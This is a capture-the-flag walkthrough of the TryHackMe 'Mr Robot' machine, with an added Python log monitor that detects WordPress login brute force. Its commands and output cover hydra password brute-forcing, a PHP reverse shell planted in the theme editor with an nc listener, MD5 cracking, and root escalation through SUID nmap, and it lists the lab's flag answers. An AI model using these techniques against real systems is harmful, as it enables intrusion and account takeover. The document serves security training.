TryHackMe · Medium
Mr Robot CTF
Inspired by the TV show Mr. Robot. The machine runs a vulnerable WordPress installation. The attack chain involves discovering a wordlist from robots.txt, brute-forcing WordPress admin, uploading a PHP reverse shell, and escalating privileges via an SUID nmap binary.
Tools: nmap, gobuster, wpscan, hydra, php-reverse-shell, john, nmap --interactive
3 Keys to Find
1. Found in robots.txt: publicly accessible from the web server root
2. Found in /home/robot/: requires cracking an MD5 hash to access as user robot
3. Found in /root/: requires privilege escalation via SUID nmap
Phase 1 — Web Enumeration & Key 1
Basic service enumeration — only web ports open, SSH is filtered.
$ nmap -sV -p- 10.10.x.x
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
Always check robots.txt early — here it reveals the first key and a wordlist.
$ curl http://10.10.x.x/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
$ curl http://10.10.x.x/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Key 1: 073403c8a58a1f80d943455fb30724b9
$ wget http://10.10.x.x/fsocity.dic
858160 entries downloaded
$ sort -u fsocity.dic > fsocity_unique.dic
11451 unique entries # reduced from 858k — speeds up brute force
Phase 2 — WordPress Exploitation & Shell
WPScan reveals WordPress installation. Brute-force the username first, then the password.
$ wpscan --url http://10.10.x.x -e u
[+] WordPress version 4.3.1 identified
[+] No users found via API, trying login bruteforce...
# Brute force username with fsocity.dic
$ hydra -L fsocity_unique.dic -p test 10.10.x.x \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
[80][http-post-form] login: elliot
# Now brute force password for user elliot
$ hydra -l elliot -P fsocity_unique.dic 10.10.x.x \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:ERROR"
[80][http-post-form] login: elliot password: ER28-0652
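Detection-side counterpart to the hydra runs above, as an added example that is not part of the original writeup: a small Python monitor that parses Apache access-log lines (sample data is constructed inline) and flags a client bursting POSTs to /wp-login.php, plus any POST to wp-admin/theme-editor.php, which is assumed here to be where the pre-4.9 theme editor submits file edits.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format (client IP, timestamp, request line, status).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    return ev

def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Return (finding, ip) tuples: login brute force and theme-editor writes."""
    findings, flagged = [], set()
    attempts = defaultdict(list)  # ip -> timestamps of POST /wp-login.php
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        path = ev["path"].split("?", 1)[0]
        if ev["method"] == "POST" and path.endswith("/wp-login.php"):
            hits = attempts[ev["ip"]]
            hits.append(ev["ts"])
            while hits and ev["ts"] - hits[0] > window:  # slide the window
                hits.pop(0)
            if len(hits) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                findings.append(("wp-login brute force", ev["ip"]))
        elif ev["method"] == "POST" and path.endswith("/wp-admin/theme-editor.php"):
            # Assumption: the pre-4.9 theme editor posts file edits to this URL.
            findings.append(("theme editor write", ev["ip"]))
    return findings

def sample_log():
    """Constructed sample: 12 login POSTs in 22 s from one IP, then a theme edit."""
    base = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    fmt = '10.10.14.5 - - [{}] "{} {} HTTP/1.1" {} 512 "-" "Mozilla/5.0"'
    lines = [fmt.format((base + timedelta(seconds=2 * i)).strftime(TS_FMT),
                        "POST", "/wp-login.php", 200) for i in range(12)]
    later = (base + timedelta(minutes=5)).strftime(TS_FMT)
    lines.append(fmt.format(later, "POST", "/wp-admin/theme-editor.php", 302))
    return lines
print(detect(sample_log()))
```

In production the same logic would tail the live access log; lowering the threshold catches slower hydra runs at the cost of more noise from legitimate login retries.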
With admin access, inject a PHP reverse shell into the WordPress theme editor (Appearance → Editor → 404.php).
# 1. Login to WordPress admin panel
# 2. Appearance → Editor → 404.php → paste php-reverse-shell.php
# 3. Change IP/port in shell to your machine
# Start listener
$ nc -lvnp 4444
# Trigger shell by visiting the 404 template
$ curl http://10.10.x.x/wp-content/themes/twentyfifteen/404.php
connect to [10.10.14.x] from 10.10.x.x
$ id
uid=1(daemon) gid=1(daemon)
Phase 3 — Key 2 & Privilege Escalation
Key 2 is readable only by user robot, but the password.raw-md5 file in the same directory is readable by our daemon shell and can be cracked.
$ ls /home/robot/
key-2-of-3.txt password.raw-md5
$ cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
# Crack with john (hash line saved to hash.txt first)
$ john --format=raw-md5 hash.txt --wordlist=rockyou.txt
abcdefghijklmnopqrstuvwxyz (robot)
$ su robot # password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Key 2: 822c73956184f694993bede3eb39f959
Find SUID binaries. Nmap has SUID bit set — older versions have an interactive mode that spawns a shell.
robot@linux:~$ find / -perm -4000 -type f 2>/dev/null
/usr/local/bin/nmap # SUID bit set!
robot@linux:~$ nmap --interactive
nmap> !sh
sh-4.3# id
uid=1002(robot) gid=1002(robot) euid=0(root)
sh-4.3# cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Key 3 (root): 04787ddef27c3dee1ee161b21670b4e4
Key Takeaways
robots.txt can leak sensitive files — always check it during recon
WordPress theme editor = code execution if admin credentials are compromised
Weak passwords (alphabetical sequence) are easily cracked by rockyou.txt
SUID binaries are a common privesc vector — always run: find / -perm -4000 2>/dev/null
nmap --interactive is a classic GTFOBins technique for SUID nmap escalation